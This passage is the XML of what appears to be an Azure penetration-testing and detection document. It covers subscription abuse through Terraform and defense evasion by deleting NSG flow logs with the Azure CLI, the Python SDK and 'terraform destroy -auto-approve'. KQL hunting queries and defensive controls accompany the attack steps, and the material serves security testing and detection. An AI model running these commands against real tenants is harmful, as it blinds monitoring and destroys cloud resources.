          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">Useful only for </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>theoretical abuse modeling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C07A218" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:pict w14:anchorId="50E5AE2C">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE243CB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D. Terraform Abuse Scenario (Privilege Misuse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724F8AC0" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>terraform import azurerm_resource_group.example /subscriptions/&lt;sub_id&gt;/resourceGroups/&lt;rg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708AD6F1" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8"/>
    <w:p w14:paraId="1964CAAC" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t># Modify deployment target to another subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABFEA59" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>terraform apply -auto-approve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E2535" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pentest Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B364A07" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Re-deploy infra into:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC2DE55" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Attacker-controlled subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD86361" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Shadow environment (bypassing monitoring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A696DDC" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:pict w14:anchorId="1657A91A">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A860CB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Detection Opportunities (KQL – Log Analytics / Sentinel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B963DB6" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>AzureActivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCA5398" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>| where OperationNameValue has_any ("Move Resources", "Write Resource")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F5DE50" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>| where ActivityStatusValue == "Success"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345E72B6" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>| where Caller !in ("approved_admin@domain.com")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26638D2E" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:lastRenderedPageBreak/>
        <w:t>AzureActivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542BE81D" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>| where OperationNameValue contains "subscription"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33748889" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>| where ActivityStatusValue == "Success"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A6CE1B" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:pict w14:anchorId="3BFEF920">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="523DAF95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2. Disabling / Removing Network Flow Logs (Defense Evasion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2385D5CD" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>هدف</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t>: Blind SOC visibility by removing NSG Flow Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6067D7D0" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:pict w14:anchorId="3FA820AF">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACF2533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A. Azure CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D2D8D0" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>az network watcher flow-log delete \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED481BE" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">  --name &lt;flow_log_name&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39826297" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">  --nsg &lt;nsg_name&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0D0B67" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">  --resource-group &lt;resource_group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417B525F" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3313EC31" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Stops traffic visibility in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E58D9F0" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>NSG Flow Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AD8043" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Traffic Analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081E6D66" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Microsoft Sentinel detections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12579A7B" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:pict w14:anchorId="2FFAAE2B">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CE0B8B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B. Azure SDK (Python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9DA971" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>from azure.mgmt.network import NetworkManagementClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177A14A4" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>from azure.identity import DefaultAzureCredential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4176A115" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8"/>
    <w:p w14:paraId="7F0E83BC" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>client = NetworkManagementClient(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE0ACB8" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">    credential=DefaultAzureCredential(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484EFE90" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">    subscription_id="&lt;subscription_id&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1988AD8F" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B771939" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8"/>
    <w:p w14:paraId="130F641F" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>client.flow_logs.begin_delete(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5080A685" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">    resource_group_name="&lt;resource_group&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72810B10" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">    network_watcher_name="NetworkWatcher_&lt;region&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B926158" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">    flow_log_name="&lt;flow_log_name&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AD429D" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E14C1D" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:pict w14:anchorId="3EF8843C">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C31CE87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C. Terraform (Destructive Action)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCCCA4B" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>terraform import azurerm_network_watcher_flow_log.example \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04794A09" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>/subscriptions/&lt;sub_id&gt;/resourceGroups/&lt;rg&gt;/providers/Microsoft.Network/networkWatchers/NetworkWatcher_&lt;region&gt;/flowLogs/&lt;flow_log_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C19E3E2" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8"/>
    <w:p w14:paraId="484819D0" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>terraform destroy -auto-approve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111309B2" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:pict w14:anchorId="5EF5B8C1">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2267AFEE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Detection &amp; Hunting (KQL – Must Have)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED51520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Detect Flow Log Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F985A65" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>AzureActivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D0B294" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>| where OperationNameValue =~ "Microsoft.Network/networkWatchers/flowLogs/delete"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5FA218" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>| where ActivityStatusValue == "Success"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDA53C0" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="13BD9E7B">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CBCF34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Detect Network Watcher Tampering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD8F1A8" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>AzureActivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BB85EF" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>| where ResourceProviderValue == "Microsoft.Network"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230DFBBE" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>| where OperationNameValue has_any ("Delete", "Write")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7F5A4C" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:t>| where Resource contains "networkWatchers"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B8113E" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:pict w14:anchorId="6C758A68">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7A461F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Key Pentest Takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE101DC" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve"> “Leaving tenant” is </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not a real attack path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16110C4C" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve"> Real attack = </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>resource movement + subscription abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27117C01" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve"> Flow log deletion = </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>high-value detection gap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CEF546" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve"> Requires </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Owner / Contributor + Network Contributor roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A46022" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:r w:rsidRPr="003718E3">
        <w:pict w14:anchorId="744B9AAF">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2708F329" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended Defensive Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D653AA6" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Enforce:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F87A21C" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t xml:space="preserve">Azure Policy → </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deny resource move across subscriptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2162E1AB" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>RBAC → Restrict:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69781A43" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Microsoft.Resources/subscriptions/resourceGroups/moveResources/action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F945E92" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Microsoft.Network/networkWatchers/flowLogs/delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FCE5E6" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Enable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360C80BF" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Activity Log alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B3F136" w14:textId="77777777" w:rsidR="00EC51F8" w:rsidRPr="003718E3" w:rsidRDefault="00EC51F8" w:rsidP="00EC51F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003718E3">
        <w:t>Microsoft Sentinel analytics rules</w:t>
      </w:r>
    </w:p>
